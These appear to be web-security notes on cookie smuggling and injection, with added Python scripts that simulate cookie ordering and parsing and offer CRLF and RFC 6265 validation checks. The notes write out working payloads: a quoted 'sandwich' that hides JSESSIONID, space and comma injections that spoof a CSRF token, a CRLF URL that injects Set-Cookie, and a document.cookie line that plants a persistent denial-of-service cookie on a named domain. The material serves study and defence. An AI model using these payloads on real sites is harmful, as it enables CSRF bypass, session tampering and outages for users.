What is Cookie Smuggling and Injection
Cookie smuggling and injection abuse frontend vulnerabilities together with the way servers parse cookies, letting an attacker smuggle cookies past the parser or retrieve HTTPS cookies.
Blog Article: Here
Exploitation
Cookie Priority
# Default
1. Path length, longest to shortest
2. Last updated time, least recent to most recent
# Set Priority
- To outrank a cookie that is already scoped to a specific path, URL-encode the "/" characters in the path: the path string becomes longer (so it sorts first) while the server still resolves it to the same location.
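The ordering rules above decide which duplicate a server sees first. The script below is an added example (not code from the original notes): it sorts a constructed cookie jar the way RFC 6265 section 5.4 prescribes (longest path first, then earliest creation time) and shows how a first-match and a last-match server lookup resolve the same header differently. The jar contents, paths, values and the `creation_time` counter are constructed for illustration.

```python
"""Added example, not part of the original notes: the Cookie header order a
browser produces per RFC 6265 section 5.4, and how a first-match or
last-match server parser then resolves a duplicated cookie name. The jar
contents, paths and cookie values below are constructed for illustration."""
from dataclasses import dataclass


@dataclass
class StoredCookie:
    name: str
    value: str
    path: str
    creation_time: int  # constructed counter standing in for a real timestamp


def path_matches(request_path: str, cookie_path: str) -> bool:
    """RFC 6265 section 5.1.4 path-match: plain string comparison, no decoding."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def cookie_header_order(jar, request_path):
    """Cookies with longer paths come first; among equal path lengths the
    earliest creation time comes first (the two rules listed in the notes)."""
    matching = [c for c in jar if path_matches(request_path, c.path)]
    return sorted(matching, key=lambda c: (-len(c.path), c.creation_time))


def build_cookie_header(jar, request_path):
    return "; ".join(f"{c.name}={c.value}" for c in cookie_header_order(jar, request_path))


def lookup(cookie_header, name, policy="first"):
    """Server-side lookup of one cookie name. Real parsers differ on which
    duplicate wins; 'first' and 'last' are the two common policies."""
    pairs = (p.partition("=") for p in cookie_header.split("; "))
    values = [v for k, _, v in pairs if k == name]
    if not values:
        return None
    return values[0] if policy == "first" else values[-1]


# Constructed jar: the legitimate session cookie was set on "/" first; a
# second cookie with the same name but a deeper path was added later.
JAR = [
    StoredCookie("session", "legit", "/", creation_time=1),
    StoredCookie("session", "tossed", "/account", creation_time=2),
    StoredCookie("theme", "dark", "/", creation_time=3),
]


def demo(request_path="/account/settings"):
    """Return the header the browser would send plus both lookup results."""
    header = build_cookie_header(JAR, request_path)
    return header, lookup(header, "session", "first"), lookup(header, "session", "last")


if __name__ == "__main__":
    print(demo())
```

The deeper-path cookie is sent first, so a first-match parser returns the later-added value while a last-match parser still returns the original one; when auditing a cookie-dependent control, check which policy every component in the request path (proxy, framework, application) applies.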
Cookie Delimitation
# Type of delimiter
- "
- ;
- ,
- [SPACE]
Cookie Smuggling & Injection
# Smuggling & Injection
## Smuggling
RENDER_TEXT="**hello world; JSESSIONID=13371337; ASDF=end**"; ---> Parsed as a single cookie
## Injection
LANGUAGE="**en-us" CSRF_TOKEN="SPOOFED_VALUE**" ---> Inject cookie with space
LANGUAGE=**en-us,CSRF_TOKEN=SPOOFED_VALUE** ---> Inject cookie with comma
- Smuggling: setting two attacker-controlled cookies around a target cookie creates a "sandwich", so the parser treats the three as one cookie value.
- Injection: a single cookie value containing a delimiter the server honours lets an attacker inject further cookies, overwriting existing ones such as the CSRF token.
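Whether the sandwich or the space/comma payloads work depends entirely on how the server splits the Cookie header. The script below is an added example (not code from the notes or from any named product): it runs the three payload shapes above through a strict RFC 6265 splitter, a quote-aware legacy-style parser (an assumption modelled on RFC 2109 quoting, not a specific server), and a lax parser that also splits on comma and space, and compares what each returns for the targeted cookie name.

```python
"""Added example, not code from the original notes or from any named product:
three server-side ways of splitting a Cookie header, run over the sandwich,
space and comma payloads from the notes (cookie names and values constructed)."""
import re


def parse_strict(header):
    """RFC 6265 section 4.2.1 style: split on ';' only, quotes are not special.
    Returns (name, value) pairs in order, duplicates preserved."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name.strip(), value.strip()))
    return pairs


def parse_quote_aware(header):
    """Legacy behaviour (assumption: modelled on RFC 2109-style quoting, not on a
    specific product): a value that starts with '"' runs to the closing '"', so a
    ';' inside the quotes does not end the cookie."""
    pairs = []
    i, n = 0, len(header)
    while i < n:
        while i < n and header[i] in " ;":
            i += 1
        if i >= n:
            break
        eq = header.find("=", i)
        if eq == -1:
            break
        name = header[i:eq].strip()
        j = eq + 1
        if j < n and header[j] == '"':
            end = header.find('"', j + 1)
            end = n if end == -1 else end
            value = header[j + 1:end]
            i = end + 1
        else:
            end = header.find(";", j)
            end = n if end == -1 else end
            value = header[j:end].strip()
            i = end
        pairs.append((name, value))
    return pairs


def parse_lax(header, delimiters=";, "):
    """Parser that also splits on ',' and space (assumption: models the lax
    behaviour the notes describe, not a specific implementation)."""
    pairs = []
    for part in re.split("[" + re.escape(delimiters) + "]+", header):
        if "=" in part:
            name, _, value = part.partition("=")
            pairs.append((name, value.strip('"')))
    return pairs


def lookup(pairs, name):
    """First-match lookup; the parser, not the browser, decides what is seen."""
    for k, v in pairs:
        if k == name:
            return v
    return None


# Payload shapes from the notes, reproduced as constructed Cookie header values.
SANDWICH = 'RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end"'
SPACE_INJECT = 'LANGUAGE="en-us" CSRF_TOKEN="SPOOFED_VALUE"'
COMMA_INJECT = "LANGUAGE=en-us,CSRF_TOKEN=SPOOFED_VALUE"


def compare(header, name):
    """What each parser returns for `name` from the same header."""
    return {
        "strict": lookup(parse_strict(header), name),
        "quote_aware": lookup(parse_quote_aware(header), name),
        "lax": lookup(parse_lax(header), name),
    }


if __name__ == "__main__":
    for label, header, name in [("sandwich", SANDWICH, "JSESSIONID"),
                                ("space", SPACE_INJECT, "CSRF_TOKEN"),
                                ("comma", COMMA_INJECT, "CSRF_TOKEN")]:
        print(label, compare(header, name))
```

Under the quote-aware parser the sandwich swallows JSESSIONID into RENDER_TEXT's value, while the strict parser still sees it as its own cookie; the lax parser is the only one that honours the comma payload. When a proxy or WAF uses one of these policies and the application another, the component that enforces a check can be looking at different cookies than the one that trusts them.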
---------------------------------------------------------------------------------
# Injection via URL (CRLF %0D%0A Injection)
/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None
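The payload above only works when the decoded parameter reaches a response header with its CR/LF intact. The script below is an added example (not from the notes): a hypothetical legacy header writer that reflects the search parameter, the resulting header split as a client would read it, the control-character check that blocks it, and a log-side test for percent-encoded CR/LF. The header builder and request path are constructed for illustration.

```python
"""Added example, not from the original notes: why the %0d%0a payload becomes a
second response header when a parameter is reflected into a header without
sanitising, and the check that stops it. Header builder and URL are constructed."""
from urllib.parse import unquote


def vulnerable_headers(search):
    """Hypothetical legacy header writer that reflects a query parameter as-is."""
    return "X-Search: " + search + "\r\nContent-Type: text/html\r\n"


def header_lines(raw):
    """Split a raw header block the way a client would: one field per CRLF."""
    return [line for line in raw.split("\r\n") if line]


def check_header_value(value):
    """Reject CR, LF and other control characters (RFC 7230 field-value rules);
    raise rather than strip, so the caller notices the bad input."""
    for ch in value:
        if ch in "\r\n" or (ord(ch) < 0x20 and ch != "\t") or ord(ch) == 0x7F:
            raise ValueError("control character in header value")
    return value


def hardened_headers(search):
    """Same writer with the check applied before the value is emitted."""
    return "X-Search: " + check_header_value(search) + "\r\nContent-Type: text/html\r\n"


def decoded_url_has_crlf(url):
    """Log-side detection: true if the percent-decoded URL contains CR or LF
    (catches %0d%0a in either case, and raw control characters)."""
    decoded = unquote(url)
    return "\r" in decoded or "\n" in decoded


# Constructed request path using the payload shape shown in the notes.
PAYLOAD_URL = "/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None"


def demo():
    """Return the headers the vulnerable writer emits and whether the
    hardened writer refuses the same input."""
    search = unquote(PAYLOAD_URL.split("search=", 1)[1])
    injected = header_lines(vulnerable_headers(search))
    try:
        hardened_headers(search)
        blocked = False
    except ValueError:
        blocked = True
    return injected, blocked


if __name__ == "__main__":
    print(demo())
    print(decoded_url_has_crlf(PAYLOAD_URL))
```

Most current HTTP libraries already refuse CR or LF in header values, so this class of bug usually lives in hand-rolled header writers, proxies or older stacks; the log check is useful because the encoded form (`%0d%0a`, in either case) survives in access logs even where the server rejected it.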
Injection of a persistent cookie that causes a denial of service (EXTRA)
document.cookie="�=🍪; domain=.grayduck.mn; Path=/; SameSite=Lax";
- Cookie name ---> � (the cookie becomes persistent because of an ASCII-handling bug)
- Cookie value ---> 🍪 (this breaks some applications because of the same ASCII handling) Blog
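Both the delimiter payloads in the smuggling and injection section and the non-ASCII name and value above fall outside the RFC 6265 cookie grammar, which gives a server a single check for all of them. The script below is an added example (not from the notes): a validator for the token (cookie-name) and cookie-octet (cookie-value) rules, with an audit that splits a Cookie header strictly and reports every pair the grammar rejects. The sample headers are constructed from the payload shapes on this page.

```python
"""Added example, not from the original notes: a validator for the RFC 6265
cookie-name (token) and cookie-value (cookie-octet) grammar, applied to the
delimiter payloads and the non-ASCII name/value from the notes. A server that
enforces this before trusting or reflecting a cookie refuses the malformed
forms instead of mis-parsing or breaking on them. Sample cookies constructed."""
import re

# token (RFC 2616 section 2.2): CHARs except CTLs and separators
TOKEN_RE = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# cookie-octet (RFC 6265 section 4.1.1): printable ASCII minus CTLs, space,
# DQUOTE, comma, semicolon and backslash
COOKIE_OCTET_RE = re.compile(r"[\x21\x23-\x2b\x2d-\x3a\x3c-\x5b\x5d-\x7e]*")


def valid_cookie_name(name):
    return TOKEN_RE.fullmatch(name) is not None


def valid_cookie_value(value):
    """cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE )"""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]
    return COOKIE_OCTET_RE.fullmatch(value) is not None


def audit_cookie_header(header):
    """Split strictly on ';' and report every pair outside the grammar.
    Returns a list of (name, reason) tuples; an empty list means clean."""
    findings = []
    for raw in header.split(";"):
        raw = raw.strip()
        if not raw:
            continue
        name, sep, value = raw.partition("=")
        name = name.strip()
        if not sep:
            findings.append((name, "missing '='"))
            continue
        if not valid_cookie_name(name):
            findings.append((name, "name is not a token"))
        if not valid_cookie_value(value.strip()):
            findings.append((name, "value has characters outside cookie-octet"))
    return findings


# Constructed headers reproducing the payload shapes from the notes.
SAMPLES = {
    "sandwich": 'RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end"',
    "space": 'LANGUAGE="en-us" CSRF_TOKEN="SPOOFED_VALUE"',
    "comma": "LANGUAGE=en-us,CSRF_TOKEN=SPOOFED_VALUE",
    "non_ascii": "\ufffd=\U0001f36a",
    "clean": "session=abc123; theme=dark",
}


def flagged_names(sample):
    """Names of the cookies the audit rejects in one of the constructed samples."""
    return [name for name, _ in audit_cookie_header(SAMPLES[sample])]


if __name__ == "__main__":
    for label in SAMPLES:
        print(label, audit_cookie_header(SAMPLES[label]))
```

The sandwich is caught on its outer cookies (RENDER_TEXT and ASDF carry a bare quote and a space), the space and comma payloads are caught on the LANGUAGE value, and the replacement character and emoji fail on both the name and value rules; the JSESSIONID in the middle of the sandwich and the clean header pass untouched.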